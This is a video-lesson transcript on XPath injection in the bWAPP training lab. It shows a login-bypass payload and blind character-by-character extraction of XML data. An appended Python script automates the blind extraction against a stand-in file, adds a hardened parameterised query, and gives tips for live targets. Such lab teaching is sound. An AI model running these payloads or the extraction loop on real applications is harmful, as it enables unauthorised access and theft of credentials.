1
00:00:00,520 --> 00:00:08,140
So it's quite common for developers to use XML documents in web applications, and XML documents are generally

2
00:00:08,140 --> 00:00:14,080
used to store configuration data or to transfer data from a source to a destination.

3
00:00:15,770 --> 00:00:21,110
So most of the programming languages are able to edit or create XML documents.

4
00:00:22,210 --> 00:00:25,930
But there is a standard query language for XML documents.

5
00:00:26,780 --> 00:00:29,210
Its name is XPath.

6
00:00:30,520 --> 00:00:33,880
So XPath stands for XML Path Language.

7
00:00:34,770 --> 00:00:47,820
XPath uses a path-like syntax to query XML documents and, like SQL, it will provide specificity for

8
00:00:47,820 --> 00:00:55,860
certain attributes to find them and then the patterns to match, so it helps to identify and navigate

9
00:00:55,860 --> 00:00:57,660
nodes in an XML document.

10
00:00:59,040 --> 00:01:07,770
Now, XPath differs from other database languages as there are no access controls or user authentication.

11
00:01:08,810 --> 00:01:16,370
For instance, an attacker can inject XPath statements in some input fields, and if there's no control

12
00:01:16,370 --> 00:01:21,140
at the back end, then it is also possible to access the entire XML document.

13
00:01:22,280 --> 00:01:25,940
So in this lesson, we're going to cover the XPath attack.

14
00:01:27,320 --> 00:01:29,780
So open Kali and log in to bWAPP.

15
00:01:31,080 --> 00:01:32,340
We are going to do both.

16
00:01:33,680 --> 00:01:38,120
So choose the first one from the menu above; it is a login form.

17
00:01:39,390 --> 00:01:41,100
Just write something and log in.

18
00:01:42,670 --> 00:01:43,840
OK, so we get an error.

19
00:01:44,990 --> 00:01:48,710
And now just enter a single quote and then log in.

20
00:01:49,910 --> 00:01:53,020
OK, so this is not what we expect, then, right?
21
00:01:53,410 --> 00:01:59,040
Normally, we're going to see SQL errors, but an XML error appears at the top of the page.

22
00:01:59,760 --> 00:02:05,150
Now, obviously, it's different, and the data transmits over the URL.

23
00:02:05,820 --> 00:02:07,410
So let's have a look at the code.

24
00:02:08,430 --> 00:02:12,120
Open xmli_1.php.

25
00:02:14,050 --> 00:02:19,420
Now the developer puts their security checks based on the security level.

26
00:02:20,410 --> 00:02:25,780
OK, so we're going to look into this function later, but now scroll down.

27
00:02:26,700 --> 00:02:33,510
And this is the part that we're looking for. See here, on line 75, the developer loads an XML file.

28
00:02:34,430 --> 00:02:40,730
Then they check the login and password in an XPath query on line 78.

29
00:02:42,010 --> 00:02:49,840
And then, based on the results of this query, it shows the message or an "Invalid credentials" error.

30
00:02:50,910 --> 00:02:52,290
OK, so exit this.

31
00:02:53,630 --> 00:02:56,840
And we can view the external functions file.

32
00:02:58,090 --> 00:03:06,430
So scroll to find an XML injection function. Up... found it, and it replaces characters that can

33
00:03:06,430 --> 00:03:10,510
be used in an XPath query with a whitespace character.

34
00:03:11,810 --> 00:03:12,860
OK, so exit.

35
00:03:14,650 --> 00:03:16,960
Then let's open Sublime Text.

36
00:03:17,940 --> 00:03:22,530
Now, before we go any further, I do want to show you the XPath query execution.

37
00:03:24,590 --> 00:03:26,180
OK, so open the Tools menu.

38
00:03:27,340 --> 00:03:29,500
Install Package Control.

39
00:03:31,580 --> 00:03:33,860
OK, so it's installed, and now click OK.

40
00:03:35,400 --> 00:03:36,780
And go to Preferences.

41
00:03:38,040 --> 00:03:39,600
Click on Package Control.

42
00:03:40,640 --> 00:03:42,710
Then click Install Package.

43
00:03:44,340 --> 00:03:48,000
And now you're going to see Sublime packages, or extensions.
44
00:03:49,030 --> 00:03:57,160
So to execute XPath queries, we're going to need an extension, so type XPath and just click on the

45
00:03:57,160 --> 00:03:57,640
first one.

46
00:03:58,730 --> 00:04:00,760
And now it will be installed in the background.

47
00:04:01,980 --> 00:04:04,770
OK, so now open the heroes.xml file.

48
00:04:09,840 --> 00:04:12,180
OK, then hit Ctrl+Shift+P.

49
00:04:13,120 --> 00:04:15,850
Type "query" and select the first one.

50
00:04:17,760 --> 00:04:19,570
So now let me zoom in for you.

51
00:04:20,160 --> 00:04:25,530
So this extension helps us to execute XPath queries on a document.

52
00:04:26,640 --> 00:04:31,080
So, OK, I'm going to paste the query from the code here.

53
00:04:32,110 --> 00:04:36,560
And the code was like that, and it contains code as well.

54
00:04:37,270 --> 00:04:38,730
So we just clean that up.

55
00:04:43,310 --> 00:04:46,130
So this is the actual XPath query.

56
00:04:47,720 --> 00:04:53,350
The logic is almost the same as SQL queries.

57
00:04:55,610 --> 00:05:02,870
So the query just means that under the heroes root element, choose a hero which has a specific login

58
00:05:02,870 --> 00:05:03,530
and password.

59
00:05:05,230 --> 00:05:07,300
All right, so now type neo.

60
00:05:08,440 --> 00:05:10,150
And then trinity.

61
00:05:11,980 --> 00:05:15,220
And now look above: the first hero element is chosen.

62
00:05:17,000 --> 00:05:21,740
So the login mechanism in this form works like that on this XML file.

63
00:05:22,980 --> 00:05:24,600
So now we can delete these values.

64
00:05:26,510 --> 00:05:28,070
And put in a single quote.

65
00:05:29,190 --> 00:05:30,240
It breaks the query.

66
00:05:31,120 --> 00:05:32,260
And nothing appears.

67
00:05:33,860 --> 00:05:38,450
And I'll type or 1=1 or a single quote.

68
00:05:40,230 --> 00:05:42,630
Then all the hero elements are chosen.

69
00:05:43,930 --> 00:05:45,520
So I'm going to copy this payload.
70
00:05:48,060 --> 00:05:50,160
And go back to Firefox.

71
00:05:51,830 --> 00:05:54,290
Paste it into this field and log in.

72
00:05:55,280 --> 00:05:57,830
And there it goes. It works. So...

73
00:06:00,720 --> 00:06:06,540
Actually, we can only see what is in the first line or, well, the first element of the result.

74
00:06:07,830 --> 00:06:13,260
OK, so now you can see the code and you can prepare your XPath payloads.

75
00:06:14,810 --> 00:06:19,040
Well, let me tell you, in a real-world test, it's not really like that.

76
00:06:20,400 --> 00:06:27,600
After you see the XML error, you need to try more for exploiting; open your perspective a little bit.

77
00:06:28,470 --> 00:06:34,580
So this was our payload. Change 1 to 2 and go... and we get an error.

78
00:06:35,430 --> 00:06:39,180
So this means that our payload executes well.

79
00:06:40,120 --> 00:06:42,100
So now it's time to pull the data.

80
00:06:43,490 --> 00:06:47,060
And we can view the first hero on the list.

81
00:06:48,150 --> 00:06:51,120
And then, by adding this code, we can view another.

82
00:06:54,140 --> 00:06:55,700
And it's the same user.

83
00:06:56,760 --> 00:06:58,500
This time, two.

84
00:07:00,570 --> 00:07:05,040
Second user is Alice. Was the third one Thor?

85
00:07:06,020 --> 00:07:07,880
It was. The fourth one, Wolverine.

86
00:07:09,160 --> 00:07:12,490
It was. The fifth one, Johnny. Six.

87
00:07:14,560 --> 00:07:16,960
Selene. Seven, one.

88
00:07:17,930 --> 00:07:21,240
OK, and because there is no other user, we get this error.

89
00:07:22,070 --> 00:07:25,820
So anyway, I'm going to give you some payloads so that you can go further.

90
00:07:27,300 --> 00:07:30,660
So to get the number of root elements, write this one.

91
00:07:32,210 --> 00:07:33,470
And we'll get the result.

92
00:07:34,730 --> 00:07:37,910
So it means that there is one root element.

93
00:07:39,080 --> 00:07:43,160
And because there is only one root element, the rest will work like that.
94
00:07:45,550 --> 00:07:48,640
So to get the number of elements in the file, write this one.

95
00:07:50,150 --> 00:07:51,560
No, it's not one.

96
00:07:55,270 --> 00:07:57,250
Yes, it is 43.

97
00:07:59,610 --> 00:08:05,040
Then to get the number of child elements under the heroes element, write this one.

98
00:08:06,730 --> 00:08:09,850
Sure enough, there are six children under heroes.

99
00:08:11,230 --> 00:08:16,680
And again, for the length of the name of the current node, the root node, type this payload.

100
00:08:18,390 --> 00:08:21,700
And the length is not one. Is it six?

101
00:08:22,570 --> 00:08:25,230
Yeah, because it is "heroes".

102
00:08:26,710 --> 00:08:33,100
So now, to get the name of the root element one character at a time, type this payload.

103
00:08:34,980 --> 00:08:36,990
The first character is not "a".

104
00:08:38,570 --> 00:08:39,230
"h"?

105
00:08:40,680 --> 00:08:47,100
Yeah, the first character is "h". Now you can follow along the same way to get the other characters.

106
00:08:48,490 --> 00:08:54,820
OK, so to get the length of the name of the first child under the root element, type this payload.

107
00:08:56,600 --> 00:08:57,980
And no, it is not one.

108
00:08:59,130 --> 00:09:00,300
So is it four?

109
00:09:01,510 --> 00:09:02,500
It sure is.

110
00:09:04,180 --> 00:09:11,050
OK, so now, to get the name of the first child under the root element one character at a time, type this payload.

111
00:09:12,300 --> 00:09:15,540
It is not "a". Is it "h"?

112
00:09:17,070 --> 00:09:18,300
And yes, it is.

113
00:09:19,340 --> 00:09:26,180
All right, so if we follow along this way, we can extract the name of the first child under the root

114
00:09:26,180 --> 00:09:26,660
element.

115
00:09:28,340 --> 00:09:35,330
OK, so now, to get the number of children of the first child under the root element, type this payload.

116
00:09:37,070 --> 00:09:38,930
Is it more than one child?

117
00:09:40,260 --> 00:09:41,310
So is it six?
118
00:09:43,970 --> 00:09:46,960
OK, so the first child has six children.

119
00:09:48,250 --> 00:09:55,360
So now let's get the length of the name of the first of these six. Type in this payload.

120
00:09:56,720 --> 00:09:58,940
No, it's not one. Is it two?

121
00:10:00,210 --> 00:10:01,170
Why, yes, it is.

122
00:10:02,540 --> 00:10:07,970
OK, so to get their names one character at a time, type in this payload.

123
00:10:09,340 --> 00:10:12,610
The first character is not "a", so let's change it.

124
00:10:12,640 --> 00:10:13,060
Why?

125
00:10:14,160 --> 00:10:15,690
And yeah, "i".

126
00:10:17,810 --> 00:10:20,030
So I assume we discovered it one by one.

127
00:10:21,360 --> 00:10:26,070
Then type this to get the length of the text of this child.

128
00:10:27,150 --> 00:10:29,580
The length of the text is one.

129
00:10:31,280 --> 00:10:33,170
OK, so was this text one?

130
00:10:34,620 --> 00:10:36,870
And yeah, the text is one.

131
00:10:37,450 --> 00:10:38,130
OK, so.

132
00:10:39,990 --> 00:10:41,170
I think you get the point, right?

133
00:10:42,030 --> 00:10:46,170
So step by step, we discover the root element, the elements, as well as the children.

134
00:10:47,600 --> 00:10:48,020
So.

135
00:10:49,160 --> 00:10:53,930
If it is necessary, you can discover the attributes and the others as well.

136
00:10:55,490 --> 00:11:00,620
But then, finally, I want to show you that we will be able to pull data from the XML file.

137
00:11:01,860 --> 00:11:03,990
So why don't we go ahead and do another example?

138
00:11:04,990 --> 00:11:08,200
So from the menu above, choose the second one.

139
00:11:10,940 --> 00:11:13,400
It selects movies based on their genre.

140
00:11:15,220 --> 00:11:18,220
So you may not see this error message on the page.

141
00:11:19,630 --> 00:11:27,220
I enabled it from the code so that I could show you how XPath finds the values, so don't freak out,

142
00:11:28,510 --> 00:11:34,900
but just open the terminal and view xmli_2.php.
143
00:11:36,960 --> 00:11:47,040
Scroll down below, and here is the XPath query, so it chooses the child element movie from the

144
00:11:47,040 --> 00:11:51,180
hero elements which have a specific genre element.

145
00:11:51,810 --> 00:11:54,270
OK, yeah, I know my sentence,

146
00:11:54,300 --> 00:11:56,220
it's a little bit long and weird, but...

147
00:11:57,180 --> 00:12:01,620
it's really what it is, and what it is is what it is.

148
00:12:03,130 --> 00:12:08,740
Anyway, the remaining part prints the output to the screen in a table.

149
00:12:10,440 --> 00:12:12,210
So why don't we go back to Sublime?

150
00:12:13,230 --> 00:12:14,610
And paste the query here.

151
00:12:16,350 --> 00:12:18,780
Now I'm going to clear the syntax.

152
00:12:20,890 --> 00:12:22,990
And this is the actual XPath query.

153
00:12:23,940 --> 00:12:27,210
And the movies immediately appear.

154
00:12:28,900 --> 00:12:34,330
Now, if I were to clear this here in the URL, I can see all the movies.

155
00:12:36,000 --> 00:12:37,620
OK, so go to Sublime again.

156
00:12:38,880 --> 00:12:40,500
Now, add a single quote here.

157
00:12:41,720 --> 00:12:42,470
And...

158
00:12:43,510 --> 00:12:44,440
nothing appears.

159
00:12:45,600 --> 00:12:47,310
Because it breaks the syntax.

160
00:12:48,400 --> 00:12:50,050
So now I'm going to add this.

161
00:12:52,000 --> 00:13:01,660
OK, so I think there is no syntax error now, and we'll add something here. OK, perfect, the result appears;

162
00:13:02,000 --> 00:13:03,030
that's what we're looking for.

163
00:13:04,090 --> 00:13:08,710
So now I'm going to copy this payload and paste it into the URL.

164
00:13:13,900 --> 00:13:14,650
And it works.

165
00:13:15,840 --> 00:13:20,430
OK, so let's go back to Sublime, and I'm going to add a few things.

166
00:13:24,160 --> 00:13:28,300
And this time it will bring all the data in the XML file.

167
00:13:29,490 --> 00:13:33,930
So I'll copy this payload and paste it in the URL and then go.
168
00:13:38,630 --> 00:13:39,620
And what do you see?

169
00:13:39,650 --> 00:13:42,530
We can view all the text data in the table.

170
00:13:44,770 --> 00:13:49,990
All right, so that wraps it up for XML injection, or XPath injection.

171
00:13:51,710 --> 00:13:55,520
So you can do whatever you want to at this stage.

172
00:13:57,280 --> 00:14:05,470
You can go further, try several other payloads, you can see what works, what doesn't work. That,

173
00:14:05,470 --> 00:14:06,790
my friends, is up to you.
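The walk-through above, as an added example that is not part of the lesson and not bWAPP's own PHP: the vulnerable concatenated query from the login form, the `' or 1=1 or '` payload, enumeration of heroes by `position()`, the blind `count()` / `string-length()` / `substring()` extraction of node names and text that the lesson does by hand, and a hardened query that passes the input as XPath variables. It uses Python with lxml instead of the app's PHP. `HEROES_XML` is a constructed stand-in for bWAPP's heroes.xml with invented values, shaped so the counts match the video (one root, 43 elements, six heroes, six children per hero); the oracle is called in-process, whereas against the real target the same yes/no signal is the welcome message versus the "Invalid credentials" error in the HTTP response.

```python
"""XPath injection walk-through in Python/lxml (added example, not bWAPP code).

HEROES_XML is a constructed stand-in for bWAPP's heroes.xml: every value is
invented; only the shape matches the lesson (1 root, 43 elements, 6 heroes,
6 children per hero).
"""
from lxml import etree

ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789_"

HEROES_XML = b"""<?xml version="1.0"?>
<heroes>
  <hero><id>1</id><login>neo</login><password>trinity</password><secret>s1</secret><movie>m1</movie><genre>action</genre></hero>
  <hero><id>2</id><login>alice</login><password>pw2</password><secret>s2</secret><movie>m2</movie><genre>horror</genre></hero>
  <hero><id>3</id><login>thor</login><password>pw3</password><secret>s3</secret><movie>m3</movie><genre>action</genre></hero>
  <hero><id>4</id><login>wolverine</login><password>pw4</password><secret>s4</secret><movie>m4</movie><genre>action</genre></hero>
  <hero><id>5</id><login>johnny</login><password>pw5</password><secret>s5</secret><movie>m5</movie><genre>action</genre></hero>
  <hero><id>6</id><login>selene</login><password>pw6</password><secret>s6</secret><movie>m6</movie><genre>horror</genre></hero>
</heroes>
"""


def load_heroes():
    return etree.ElementTree(etree.fromstring(HEROES_XML))


def vulnerable_login(tree, login, password):
    """The lesson's pattern: input concatenated straight into the XPath string.
    Returns the <login> of every matching hero (the bWAPP page shows only the
    first). A lone single quote raises etree.XPathEvalError, which is the XML
    error the lesson sees on the page."""
    query = "//hero[login='" + login + "' and password='" + password + "']"
    return [h.findtext("login") for h in tree.xpath(query)]


# Hardened form: the expression is fixed, the input travels as XPath variables
# and can never change the grammar of the query.
SAFE_QUERY = etree.XPath("//hero[login=$login and password=$password]")


def safe_login(tree, login, password):
    return [h.findtext("login") for h in SAFE_QUERY(tree, login=login, password=password)]


def make_oracle(tree):
    """Boolean oracle for blind extraction. The payload turns the predicate into
      login='' or <cond> or '' and password='x'
    and because 'and' binds tighter than 'or', only <cond> decides whether any
    hero matches (i.e. whether the login 'succeeds')."""
    def oracle(condition):
        payload = "' or " + condition + " or '"
        try:
            return bool(vulnerable_login(tree, payload, "x"))
        except etree.XPathEvalError:
            return False
    return oracle


def extract_count(oracle, node_set, max_n=64):
    """count(<node_set>) recovered by guessing, e.g. count(/*) or count(//*)."""
    for n in range(max_n + 1):
        if oracle("count(%s)=%d" % (node_set, n)):
            return n
    raise ValueError("count exceeds max_n")


def extract_string(oracle, expr, max_len=32):
    """String value of <expr> recovered one character at a time, the way the
    lesson walks name(/*), name(/*/*[1]), ...: string-length() first, then
    substring(expr, i, 1) against ALPHABET for each position."""
    length = None
    for n in range(max_len + 1):
        if oracle("string-length(%s)=%d" % (expr, n)):
            length = n
            break
    if length is None:
        raise ValueError("string longer than max_len")
    out = ""
    for i in range(1, length + 1):
        for c in ALPHABET:
            if oracle("substring(%s,%d,1)='%s'" % (expr, i, c)):
                out += c
                break
        else:
            out += "?"  # character outside ALPHABET
    return out


if __name__ == "__main__":
    tree = load_heroes()
    print(vulnerable_login(tree, "neo", "trinity"))               # the first hero
    print(vulnerable_login(tree, "' or 1=1 or '", "x"))           # every hero
    print(vulnerable_login(tree, "' or position()=2 or '", "x"))  # second hero
    print(safe_login(tree, "' or 1=1 or '", "x"))                 # payload is inert
    oracle = make_oracle(tree)
    print(extract_count(oracle, "/*"), extract_count(oracle, "//*"))
    print(extract_string(oracle, "name(/*)"), extract_string(oracle, "name(/*/*[1])"))
    print(extract_string(oracle, "//hero[login='neo']/password"))
```

The oracle wraps any XPath 1.0 condition, so the same loop that recovers `name(/*)` also pulls `//hero[login='neo']/password` once the structure is known; against a live target, add rate limiting and a broader alphabet, and note that `position()` counts siblings under the same parent, which is why it enumerates heroes here. The hardened `safe_login` is the fix the lesson's character-stripping function approximates: with variables there is no character left to strip.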